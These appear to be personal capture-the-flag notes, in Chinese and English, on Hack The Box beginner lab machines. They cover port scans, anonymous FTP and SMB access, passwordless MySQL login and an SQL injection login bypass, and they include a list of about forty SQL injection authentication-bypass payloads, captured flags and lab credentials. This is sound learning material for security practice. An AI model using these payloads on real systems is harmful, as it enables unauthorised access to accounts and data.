1. 连接vpn
使用openvpn连接,需要sudo,好像有点奇怪,之前不用的。
1 | ┌──(kali㉿kali)-[~/Desktop] |
2. Process
得到目标ip:10.129.148.244
nmap:
1 | ──(kali㉿kali)-[~/Desktop] |
telnet test:
1 | ──(kali㉿kali)-[~/Desktop] |
3. Success
Fawn
10.129.150.22:
1 | ──(kali㉿kali)-[~] |
connectted ftp using anonymous
user to get the flag.txt:
1 | ┌──(kali㉿kali)-[~] |
Dancing
10.129.150.33:
1 | ─$ nmap -sC -sV 10.129.150.33 127 ⨯ 1 ⚙ |
1 | └─$ smbclient -L 10.129.150.33 1 ⨯ 1 ⚙ |
1 | ──(kali㉿kali)-[~] |
Appointment
SQL,basic, 10.129.150.95
nmap scan, got port 80 is open for httpd, it’s a login webpage.
dirb to brute-forcing, no result.
test sql basics:
1 | username: admin' # |
got flag!
e3d0796d002a446c0e622226f42e9672
SQL basics:
1’ OR ‘1’=’1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38 ' or 1='1
'or'='or'
admin
admin'--
admin' or 4=4--
admin' or '1'='1'--
admin888
"or "a"="a
admin' or 2=2#
a' having 1=1#
a' having 1=1--
admin' or '2'='2
')or('a'='a
or 4=4--
c
a'or' 4=4--
"or 4=4--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 4=4
'OR 4=4%00
"or 4=4%00
'xor
admin' UNION Select 1,1,1 FROM admin Where ''='
1
-1%cf' union select 1,1,1 as password,1,1,1 %23
1
17..admin' or 'a'='a 密码随便
'or'='or'
'or 4=4/*
something
' OR '1'='1
1'or'1'='1
admin' OR 4=4/*
1'or'1'='1
安装gobuster:
sudo apt install golang-go -y
sudo apt install gccgo-go -y
go install github.com/OJ/gobuster/v3@latest
Sequel
rustscan:
1 | └─$ rustscan --help 1 ⚙ |
scan result:
1 | ┌──(kali㉿kali)-[~] |
mysql -h 10.129.150.160 -u root
mysql> show databases;
mysql> use htb;
mysql> show tables;
mysql> select * from config;
then got flag.
mysql cheat-sheet: https://www.mysqltutorial.org/mysql-cheat-sheet.aspxC
Crocodile
10.129.151.56
rustscan: 21, 80
then use nmap to scan specifoc ports:
1 | ┌──(kali㉿kali)-[~] |
anonymous login to ftp: get user/pwd lists.
userlist:
aron
pwnmeow
egotisticalsw
admin
pwdlist:
root
Supersecretpassword1
@BaASD&9032123sADS
rKXM59ESxesUFHAd
use admin/rKXM59ESxesUFHAd to login at http://10.129.151.56/login.php , then got flag!
c7110277ac44d78b6a9fff2232434d16.